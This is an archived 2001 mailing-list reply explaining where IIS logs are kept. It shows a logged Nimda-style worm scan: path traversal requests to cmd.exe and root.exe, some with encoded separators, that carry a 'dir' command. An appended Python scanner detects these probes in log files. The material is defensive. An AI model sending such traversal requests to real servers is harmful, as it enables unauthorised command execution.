The UK Home Automation Archive


Re: IIS Worm


  • To: ukha_d@xxxxxxx
  • Subject: Re: IIS Worm
  • From: "Mark Hetherington" <mark.egroups@xxxxxxx>
  • Date: Wed, 19 Sep 2001 09:38:47 -0000
  • Delivered-to: mailing list ukha_d@xxxxxxx
  • Mailing-list: list ukha_d@xxxxxxx; contact ukha_d-owner@xxxxxxx
  • Reply-to: ukha_d@xxxxxxx

--- In ukha_d@y..., Pedro de Oliveira <oliveirp@B...> wrote:
> I am new to this IIS thing so any help would be appreciated.  I am on a LAN
> and am serving via IIS.  I know I was not affected by Nimda but would like
> to know if an attempt was made to infect me.  I remember there is a log for
> these types of things but I can't remember for the life of me where it is.
> I am running Win2k Pro.

Pedro,

Look at the following location:

C:\WINNT\system32\LogFiles

This should have log files for most of your services. The W3SVC
directories relate to the web server logs.

An attack will look similar to this (note: IP addresses blanked for
privacy, first IP is the attacking machine, second is your web server
IP):

2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 403 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..=C1=1C../..=C1=1C../..=C1=1C../winnt/system32/cmd.exe /c+dir 403 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..=C1=1C../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:02 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -


HTH.

Mark.
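As an added example, not part of Mark's message or the list, here is a small Python scanner for log lines in the W3C layout shown above. It flags the two things his excerpt illustrates, requests for cmd.exe/root.exe and ".." traversal with an encoded separator, and counts them per client address; the addresses and lines in SAMPLE_LOG are constructed, not taken from the thread.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample in the same layout as the excerpt:
# date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status
# The third probe carries the raw 0xC1 0x1C byte pair the archive renders as =C1=1C;
# read a real file with encoding="latin-1" so those bytes survive as characters.
SAMPLE_LOG = (
    "2001-09-19 00:05:59 10.0.0.5 - 192.168.1.10 80 GET /scripts/root.exe /c+dir 404 -\n"
    "2001-09-19 00:05:59 10.0.0.5 - 192.168.1.10 80 GET /MSADC/root.exe /c+dir 403 -\n"
    "2001-09-19 00:06:00 10.0.0.5 - 192.168.1.10 80 GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe /c+dir 500 -\n"
    "2001-09-19 00:06:01 10.0.0.5 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -\n"
    "2001-09-19 00:06:02 10.0.0.5 - 192.168.1.10 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -\n"
    "2001-09-19 00:07:10 10.0.0.9 - 192.168.1.10 80 GET /index.htm - 200 -\n"
    "2001-09-19 00:07:11 10.0.0.9 - 192.168.1.10 80 GET /images/logo.gif - 200 -\n"
)
FIELDS = ("date", "time", "c_ip", "cs_username", "s_ip", "s_port", "cs_method",
          "cs_uri_stem", "cs_uri_query", "sc_status", "sc_win32_status")

# A request for a command shell, or ".." followed by a separator that is
# percent-encoded (%5c, %2f), the overlong byte pair, or already decoded.
SHELL_RE = re.compile(r"/(cmd|root)\.exe$", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"\.\.(?:%5c|%2f|\xc1\x1c|[\\/])", re.IGNORECASE)

def parse_line(line):
    """Split one line into a dict; skip '#' directives and malformed lines.
    0x1C counts as whitespace for str.split(), so split on a literal space."""
    if line.startswith("#"):
        return None
    parts = line.split(" ")
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def is_worm_probe(entry):
    raw = entry["cs_uri_stem"]
    decoded = unquote(raw, encoding="latin-1")   # %5c -> \, %2f -> /
    return bool(SHELL_RE.search(decoded) or TRAVERSAL_RE.search(raw)
                or TRAVERSAL_RE.search(decoded))

def find_probes(log_text):
    """(client IP, URI stem, status) for each flagged line. str.splitlines()
    also breaks on 0x1C, so split on newlines only."""
    hits = []
    for line in log_text.split("\n"):
        entry = parse_line(line)
        if entry and is_worm_probe(entry):
            hits.append((entry["c_ip"], entry["cs_uri_stem"], entry["sc_status"]))
    return hits

def probes_by_source(log_text):
    """Flagged requests per client address, to see who was scanning you."""
    return dict(Counter(ip for ip, _, _ in find_probes(log_text)))

if __name__ == "__main__":
    for ip, stem, status in find_probes(SAMPLE_LOG):
        print(f"{ip} {status} {stem!r}")
    print(probes_by_source(SAMPLE_LOG))
```

Point it at a real W3SVC file with open(path, encoding="latin-1") and pass the text to probes_by_source.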


